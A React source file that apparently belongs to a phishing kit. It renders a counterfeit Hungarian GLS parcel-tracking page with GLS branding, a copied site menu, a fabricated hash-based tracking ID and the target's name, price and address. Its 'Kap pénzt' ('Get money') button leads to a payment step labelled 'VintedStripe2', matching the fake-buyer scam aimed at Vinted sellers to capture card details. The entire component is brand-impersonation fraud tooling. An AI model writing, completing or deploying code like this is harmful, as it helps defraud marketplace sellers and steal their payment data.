import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './GlsHuSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const FOOTER_IMG = `${process.env.PUBLIC_URL || ''}/gls-hu-footer.png`;
const LOGO_IMG = `${process.env.PUBLIC_URL || ''}/gls-hu-logo.png`;

function formatTrackId(page) {
  const raw = (page?.page_code || page?.unique_id || '').toString().replace(/\W/g, '');
  let n = 0;
  for (let i = 0; i < raw.length; i += 1) n = (n * 31 + raw.charCodeAt(i)) >>> 0;
  return String(100000000 + (n % 900000000)).slice(0, 9);
}

/**
 * GLS (HU) — magyar nyelvű követési nézet + CTA → index2 (VintedStripe2).
 */
function GlsHuSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [openShip, setOpenShip] = useState(true);
  const [openTrack, setOpenTrack] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'HU').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'HUF';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const priceLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const recipient = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim();
  const nameLine = recipient || (pageData?.product_name || '').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const trackId = pageData ? formatTrackId(pageData) : '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const steps = [
    { icon: '💻', label: 'Előtörlesztés', done: true },
    { icon: '🚚', label: 'Úton', done: false },
    { icon: '🏭', label: 'Végső csomagküldő központ', done: false },
    { icon: '📬', label: 'Szállításban', done: false },
    { icon: '📦', label: 'Szállítva', done: false },
  ];

  if (loading && pageCode) {
    return (
      <div className="glshu-wrap">
        <header className="glshu-top">
          <div className="glshu-top-inner">
            <div className="glshu-brand">
              <img className="glshu-logo-img" src={LOGO_IMG} alt="GLS" width={246} height={92} decoding="async" />
            </div>
            <div className="glshu-profile" aria-hidden>
              <svg viewBox="0 0 24 24" width="20" height="20" fill="currentColor">
                <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
              </svg>
            </div>
          </div>
        </header>
        <main className="glshu-main">
          <p className="glshu-loading">Betöltés…</p>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="glshu-wrap">
      <header className="glshu-top">
        <div className="glshu-top-inner">
          <div className="glshu-brand">
            <img className="glshu-logo-img" src={LOGO_IMG} alt="GLS" width={246} height={92} decoding="async" />
          </div>
          <div className="glshu-profile" aria-hidden>
            <svg viewBox="0 0 24 24" width="20" height="20" fill="currentColor">
              <path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
            </svg>
          </div>
        </div>
      </header>

      <nav className="glshu-nav" aria-label="Főmenü">
        <span>Rólunk</span>
        <span>A GLS tájékoztat</span>
        <span>A mi üzletünk</span>
        <span>A mi felelősségünk</span>
        <span>Híradó</span>
        <span>Karrierek</span>
      </nav>

      <main className="glshu-main">
        <section className="glshu-accordion">
          <button
            type="button"
            className="glshu-acc-head"
            onClick={() => setOpenShip((v) => !v)}
            aria-expanded={openShip}
          >
            <span>Szállítási információ</span>
            <span className="glshu-acc-toggle" aria-hidden>
              {openShip ? '−' : '+'}
            </span>
          </button>
          {openShip ? (
            <div className="glshu-acc-panel glshu-acc-panel--gray">
              <h3 className="glshu-ref-title">Hivatkozások</h3>
              <dl className="glshu-kv">
                <div>
                  <dt>Név</dt>
                  <dd>{nameLine}</dd>
                </div>
                <div>
                  <dt>Ár</dt>
                  <dd>{priceLine}</dd>
                </div>
                <div>
                  <dt>Cím</dt>
                  <dd>{address}</dd>
                </div>
                <div>
                  <dt>Track-ID</dt>
                  <dd>{trackId}</dd>
                </div>
              </dl>
            </div>
          ) : null}
        </section>

        <section className="glshu-accordion">
          <button
            type="button"
            className="glshu-acc-head"
            onClick={() => setOpenTrack((v) => !v)}
            aria-expanded={openTrack}
          >
            <span>Részletes szállítmánykövetés</span>
            <span className="glshu-acc-toggle" aria-hidden>
              {openTrack ? '−' : '+'}
            </span>
          </button>
          {openTrack ? (
            <div className="glshu-acc-panel glshu-acc-panel--gray">
              <p className="glshu-track-placeholder">
                A részletes események a küldemény azonosítója alapján jelennek meg.
              </p>
            </div>
          ) : null}
        </section>

        <section className="glshu-progress-wrap" aria-label="Szállítás állapota">
          <div className="glshu-progress">
            {steps.map((s) => (
              <div key={s.label} className={`glshu-step ${s.done ? 'glshu-step--done' : ''}`}>
                <div className="glshu-step-icon" aria-hidden>
                  {s.icon}
                </div>
                <div className="glshu-step-line" />
                <div className="glshu-step-label">{s.label}</div>
              </div>
            ))}
          </div>
          <Link to={index2Path} className="glshu-cta">
            Kap pénzt
          </Link>
        </section>
      </main>

      <footer className="glshu-footer">
        <img src={FOOTER_IMG} alt="" className="glshu-footer-img" width={1600} height={320} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default GlsHuSuccess;
